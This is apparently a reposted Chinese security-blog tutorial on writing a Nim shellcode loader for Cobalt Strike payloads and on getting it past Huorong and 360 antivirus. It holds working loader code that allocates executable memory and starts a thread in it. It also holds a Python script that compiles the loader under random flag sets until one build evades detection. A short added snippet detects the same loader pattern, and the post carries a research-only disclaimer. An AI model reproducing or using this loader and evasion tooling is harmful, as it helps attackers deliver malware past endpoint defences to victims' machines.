Using the niche programming language Nim to evade Huorong and 360

admin, 7 May 2025 17:14:52

This tutorial only explores how well a niche language does at evading antivirus and shares the Nim fuzz-compile script; it is not a one-click evasion solution, so go easy on me.

If the written tutorial is hard to follow, you can watch the author's Bilibili video tutorial: https://www.bilibili.com/video/BV1NHGmzoECA/
By the time this article was written, the sample had already been submitted to Huorong.

1. A brief introduction to the Nim programming language

Why Nim is well suited to writing shellcode loaders

  1. Low detection rate (static-analysis bypass)
    • Because Nim compiles by first translating to C and then building that C, its binaries lack the obvious signatures of typical C/C++ or Go programs
    • Many AV/EDR products and static analysers have only weak fingerprints for Nim programs, so detection rates are low
  2. Calling low-level APIs is simple and direct
    • Nim can call Windows APIs such as VirtualAlloc, CreateThread and WriteProcessMemory with very little friction, which matters when loading shellcode.
    • Inline assembly (asm) and manual memory management are supported.
  3. Small and inconspicuous
    • Nim binaries can be very small (even a few tens of KB), which suits a small, unobtrusive loader.
    • Compilation options are flexible: static linking, optimisation level and stripping of debug information can all be controlled, which further lowers the chance of being noticed.
  4. Easy to generate variants
    • Nim's macro and template system makes it easy to generate variant shellcode loaders automatically (different calling methods, different encryption), which is useful against signature-based detection.
  5. High development productivity
    • Nim's syntax is modern and close to Python, so writing a loader is much easier than in plain C while keeping near-C low-level control.

2. Installing Nim and setting up the development environment

  1. Download: https://nim-lang.org/install.html
  2. After downloading and extracting, add the bin directory to the PATH environment variable
  3. Run nim -v in cmd; if it prints the version, the installation succeeded
  4. Use VS Code as the editor and install the Nim code-completion extension

3. Writing the shellcode loader

Here is the simplest Nim loader the author put together:

```nim
import winim/lean
import std/strutils   # toHex

proc main() =
    # The original post pastes a Cobalt Strike shellcode byte array here;
    # the bytes are elided in this copy (the text says to paste your own).
    var shellcode: seq[byte] = @[]
    let shellcodeSize = shellcode.len
    if shellcodeSize == 0:
        return   # nothing to run, and shellcode[0] below would be out of bounds

    echo "[*] 分配内存..."
    let mem = VirtualAlloc(
        nil,
        cast[SIZE_T](shellcodeSize),
        MEM_COMMIT or MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    )
    if mem == nil:
        echo "[-] VirtualAlloc 失败: ", GetLastError()
        return
    echo "[+] 内存分配成功: ", cast[int](mem).toHex()

    echo "[*] 复制 shellcode 到分配的内存..."
    copyMem(mem, unsafeAddr shellcode[0], cast[SIZE_T](shellcodeSize))

    echo "[*] 创建线程执行 shellcode..."
    let thread = CreateThread(
        nil,
        0,
        cast[LPTHREAD_START_ROUTINE](mem),
        nil,
        0,
        nil
    )
    # CreateThread returns NULL (0) on failure, not INVALID_HANDLE_VALUE
    if thread == 0:
        echo "[-] CreateThread 失败: ", GetLastError()
        return
    echo "[+] 线程创建成功, 等待执行完成..."
    discard WaitForSingleObject(thread, INFINITE)

    echo "[*] 清理..."
    discard VirtualFree(mem, 0, MEM_RELEASE)
    discard CloseHandle(thread)
    echo "[+] 完成"

when isMainModule:
    main()
```

Copy the CS shellcode into the loader, then use the author's small Nim fuzz-compile tool to build the source with many different flag combinations; as long as one of the builds gets past the antivirus, I count it as a success (this Python script compiles the source using a variety of compilation settings):

```python
import os
import random
import string
import subprocess
from pathlib import Path

# ========== Configuration ==========
OUTPUT_DIR = "output"      # output directory
# ===================================

# Pool of commonly used compiler flags (covers the usual techniques)
COMPILER_FLAGS_POOL = [
    ["-d:release"],                                     # release build
    ["-d:danger"],                                      # drop all runtime checks
    ["--opt:size"],                                     # optimise for size
    ["--opt:speed"],                                    # optimise for speed
    ["--gc:arc"],                                       # ARC memory management
    ["--gc:orc"],                                       # ORC memory management
    ["--threads:on"],                                   # enable thread support
    ["--tlsEmulation:off"],                             # disable TLS emulation
    ['--passC:"-fomit-frame-pointer"'],                 # omit the stack frame pointer
    ['--passL:"-Wl,--gc-sections"'],                    # drop unused sections
    ['--passC:"-ffunction-sections -fdata-sections"'],  # finer-grained sections
    ["-d:strip"],                                       # strip the symbol table
]

# Fixed (common) combinations
FIXED_COMBINATIONS = [
    ["-d:release", "--opt:size", "--gc:arc"],
    ["-d:release", "--opt:speed", "--gc:orc"],
    ["-d:danger", "--threads:on", "--gc:arc"],
    ["-d:release", '--passC:"-fomit-frame-pointer"', '--passL:"-Wl,--gc-sections"'],
]


def random_filename(length=8):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))


def compile_with_flags(source_file, output_dir, flags):
    filename = random_filename() + ".exe"
    flags_str = " ".join(flags)
    output_path = Path(output_dir) / filename
    # note the space before the source file; without it nim sees one mangled argument
    cmd = f"nim c {flags_str} -o:{output_path} {source_file}"
    print(f"[+] 编译 {output_path} with flags: {flags_str}")
    try:
        subprocess.run(cmd, shell=True, check=True)
        return filename, flags_str  # return the file name and the flags used
    except subprocess.CalledProcessError:
        print("[!] 编译失败,跳过。")
        return None, None


def main():
    # ask the user for the Nim source file
    nim_source = input("请输入要编译的Nim源文件路径: ")
    # make sure the input file exists
    if not os.path.isfile(nim_source):
        print(f"[!] 错误: 文件 {nim_source} 不存在!")
        return
    os.makedirs(OUTPUT_DIR, exist_ok=True)

    # every compiled exe together with the flags that produced it
    compile_results = []

    # compile the fixed combinations first
    for flags in FIXED_COMBINATIONS:
        filename, flags_str = compile_with_flags(nim_source, OUTPUT_DIR, flags)
        if filename:
            compile_results.append((filename, flags_str))

    # then 10 random combinations
    for _ in range(10):
        random_flags = []
        # pick 3-5 flag groups at random
        for _ in range(random.randint(3, 5)):
            random_flags += random.choice(COMPILER_FLAGS_POOL)
        filename, flags_str = compile_with_flags(nim_source, OUTPUT_DIR, random_flags)
        if filename:
            compile_results.append((filename, flags_str))

    # print the results
    print("\n[+] 编译完成,结果如下:")
    for filename, flags_str in compile_results:
        print(f"{filename} 编译参数: {flags_str}")


if __name__ == "__main__":
    main()
```

Using this script, the finished loader was compiled with different flag sets into 14 exe files, which were then scanned by 360 and Huorong.
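As an added example (not from the original post or its author), the following Python detection logic shows the defender's view of the two pieces above: whichever flag combination the fuzz script picks, the resulting binary still allocates an RWX region with VirtualAlloc and then starts a thread inside it, so a behavioural check on that sequence is unaffected by the hash churn. The trace format and the log lines are constructed for this example, not any product's real telemetry.

```python
import re

# Constructed sample of a per-process API-call trace. The line format
# "<pid> <api> key=value ..." is an assumption made for this example.
SAMPLE_TRACE = """\
1234 VirtualAlloc addr=0x1a0000 size=4096 protect=PAGE_EXECUTE_READWRITE
1234 CreateThread start=0x1a0000
5678 VirtualAlloc addr=0x2b0000 size=65536 protect=PAGE_READWRITE
5678 CreateThread start=0x7ff6c0001000
"""

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\s*(?P<args>.*)$")


def parse_line(line):
    """Turn one trace line into a dict; returns None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = dict(kv.split("=", 1) for kv in m.group("args").split() if "=" in kv)
    return {"pid": int(m.group("pid")), "api": m.group("api"), **args}


def find_rwx_thread_starts(trace):
    """Return (pid, start) pairs for threads whose start address lies inside an
    RWX region the same process allocated earlier in the trace. This is the
    VirtualAlloc(PAGE_EXECUTE_READWRITE) -> CreateThread(mem) sequence of the
    loader above; no compiler flag the fuzz script varies changes it."""
    rwx_regions = {}  # pid -> list of (base, end) RWX allocations
    hits = []
    for raw in trace.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        if ev["api"] == "VirtualAlloc" and ev.get("protect") == "PAGE_EXECUTE_READWRITE":
            base = int(ev["addr"], 16)
            rwx_regions.setdefault(ev["pid"], []).append((base, base + int(ev["size"])))
        elif ev["api"] == "CreateThread":
            start = int(ev["start"], 16)
            if any(base <= start < end for base, end in rwx_regions.get(ev["pid"], [])):
                hits.append((ev["pid"], hex(start)))
    return hits


if __name__ == "__main__":
    for pid, start in find_rwx_thread_starts(SAMPLE_TRACE):
        print(f"[!] pid {pid}: thread started inside RWX allocation at {start}")
```

Only pid 1234 is flagged: pid 5678 allocated a non-executable region and started its thread at an unrelated address.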


In the end one of them survived, which is enough for me, haha; after all, the loader was hardly changed at all.

This article is only a simple study of antivirus evasion with a niche programming language; the code is the most basic possible and does no anti-sandbox work or per-antivirus loader tailoring, so go easy on me!
Anyone interested in 地图大师's latest security research can visit the author's personal site: https://www.ditusec.com

This article was originally published on the WeChat official account 地图大师的漏洞追踪指南: 小众编程语言NIM实现免杀过火绒及360

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or other valid mailbox so the message is not blocked; contact details are on the home page).
Published by admin on 7 May 2025 17:14:52. Please keep this link when reposting (CN-SEC, with thanks to the original author): https://cn-sec.com/archives/4034055.html